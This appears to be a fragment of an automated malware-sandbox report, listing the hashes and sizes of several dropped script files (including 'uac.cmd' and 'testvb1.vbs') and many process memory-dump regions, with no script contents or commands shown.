                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            a1cd6a64e8f8ad5d4b6c07dc4113c7ec

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            60e2f48a51c061bba72a08f34be781354f87aa49

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            b994ae5cbfb5ad308656e9a8bf7a4a866fdeb9e23699f89f048d7f92e6bb8577

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            87a42901a63793653d49f1c6d410a429cabb470b4c340c4553cbd9eccacb38d8543f85455465e0a432d737e950c590175dad744094861f7c3e575446a65b41e8

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\stwinvr.cmd

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            1KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            3c042a03e9614ea74ef10c3995d2b15c

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            3d6ec779ee428119c4bb3bd02d5296b6ff8a49c3

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            472b555044510a66fb3b6bcd152ac8aa60582a7fce6d36e2e91e42bb3a938928

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            d518c9606786fd6c23be216da78fc4c0a2fe33f41a179d8a6f98cf2711f3e018719c9ea3beb62d6d109637bee0d3c0c3b4a954d1cf582ed65f13e8c0e18471f4

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\uac.cmd

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            431B

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            a096f7e33f10234fcb20d9f33e44c456

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            abff898911a9961e492dea122c956084301f7fe1

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            7288eba06f3edd64231fcb8a801107ae6848408d3f5b758b5953399c91d7244b

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            f71c7458096a84281b7e5062b71f0d1957002b375e8a259e57c16ede643fc534fe9046156071a2518221846bad53b33e0255db0ecf2ff3ef24e70bb07bfd456f

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Public\testvb1.vbs

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            186B

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            de9cf902195071ffc4243727c838ba03

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            d09cb5a1df64460973ff95275faa9a4dd6a80c64

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            5878f152c4f030797757c0579ea8207e27e6c625c0aca481eabb2db5cf73f1af

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            524fa2a36a4925a34183e333400a19f0bc97640feaaf74ed116dd18c5a0bb5582054b3fbe8397c4734f8519fb303a408ff5d07975776d236b19865582c02f72a

                                                                                                                                                                                                                                                                                                                                          • memory/60-329-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/660-403-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/664-96-0x0000000005640000-0x0000000005994000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/664-102-0x0000000008140000-0x00000000087BA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            6.5MB

                                                                                                                                                                                                                                                                                                                                          • memory/700-174-0x0000000007090000-0x00000000070AE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            120KB

                                                                                                                                                                                                                                                                                                                                          • memory/700-188-0x0000000007430000-0x000000000743E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            56KB

                                                                                                                                                                                                                                                                                                                                          • memory/700-152-0x0000000005950000-0x0000000005CA4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/700-163-0x0000000007050000-0x0000000007082000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            200KB

                                                                                                                                                                                                                                                                                                                                          • memory/700-185-0x00000000070C0000-0x0000000007163000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            652KB

                                                                                                                                                                                                                                                                                                                                          • memory/700-164-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/968-730-0x0000000005FA0000-0x00000000062F4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/1112-214-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/1484-774-0x0000000005CA0000-0x0000000005FF4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/1496-319-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/1716-371-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/1752-720-0x0000000005670000-0x00000000059C4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/1752-726-0x0000000006270000-0x00000000062BC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/2096-540-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/2452-361-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/2604-68-0x0000000005FB0000-0x0000000006304000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/2720-189-0x0000000007C30000-0x0000000007C44000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                                                                                          • memory/2720-190-0x0000000007D40000-0x0000000007D5A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            104KB

                                                                                                                                                                                                                                                                                                                                          • memory/2720-187-0x0000000007BF0000-0x0000000007C01000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            68KB

                                                                                                                                                                                                                                                                                                                                          • memory/2720-186-0x0000000007A50000-0x0000000007A5A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            40KB

                                                                                                                                                                                                                                                                                                                                          • memory/2720-191-0x0000000007C70000-0x0000000007C78000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            32KB

                                                                                                                                                                                                                                                                                                                                          • memory/2720-175-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/2936-530-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/2940-446-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/2940-435-0x00000000063B0000-0x0000000006704000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/4320-43-0x0000000006B60000-0x0000000006B82000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            136KB

                                                                                                                                                                                                                                                                                                                                          • memory/4320-38-0x0000000006160000-0x00000000064B4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/4320-24-0x0000000003020000-0x0000000003056000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            216KB

                                                                                                                                                                                                                                                                                                                                          • memory/4320-25-0x00000000058E0000-0x0000000005F08000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            6.2MB

                                                                                                                                                                                                                                                                                                                                          • memory/4320-26-0x0000000005760000-0x0000000005782000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            136KB

                                                                                                                                                                                                                                                                                                                                          • memory/4320-27-0x0000000005F80000-0x0000000005FE6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            408KB

                                                                                                                                                                                                                                                                                                                                          • memory/4320-28-0x0000000005FF0000-0x0000000006056000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            408KB

                                                                                                                                                                                                                                                                                                                                          • memory/4320-39-0x0000000006600000-0x000000000661E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            120KB

                                                                                                                                                                                                                                                                                                                                          • memory/4320-40-0x0000000006630000-0x000000000667C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/4320-41-0x00000000077D0000-0x0000000007866000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            600KB

                                                                                                                                                                                                                                                                                                                                          • memory/4320-42-0x0000000006AF0000-0x0000000006B0A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            104KB

                                                                                                                                                                                                                                                                                                                                          • memory/4320-44-0x0000000007E20000-0x00000000083C4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            5.6MB

                                                                                                                                                                                                                                                                                                                                          • memory/4372-615-0x00000000078E0000-0x00000000078F1000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            68KB

                                                                                                                                                                                                                                                                                                                                          • memory/4372-604-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/4372-614-0x0000000007590000-0x0000000007633000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            652KB

                                                                                                                                                                                                                                                                                                                                          • memory/4404-266-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/4428-672-0x00000000057C0000-0x0000000005B14000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/4428-674-0x0000000005D40000-0x0000000005D8C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/4468-477-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/4624-245-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/4628-224-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/4804-413-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/5524-11-0x0000000000400000-0x00000000013B9000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            15.7MB

                                                                                                                                                                                                                                                                                                                                          • memory/5540-498-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/5592-63-0x0000000006250000-0x00000000065A4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            3.3MB

                                                                                                                                                                                                                                                                                                                                          • memory/5592-65-0x0000000006830000-0x000000000687C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/5840-287-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/5860-563-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB

                                                                                                                                                                                                                                                                                                                                          • memory/6124-456-0x0000000070520000-0x000000007056C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            304KB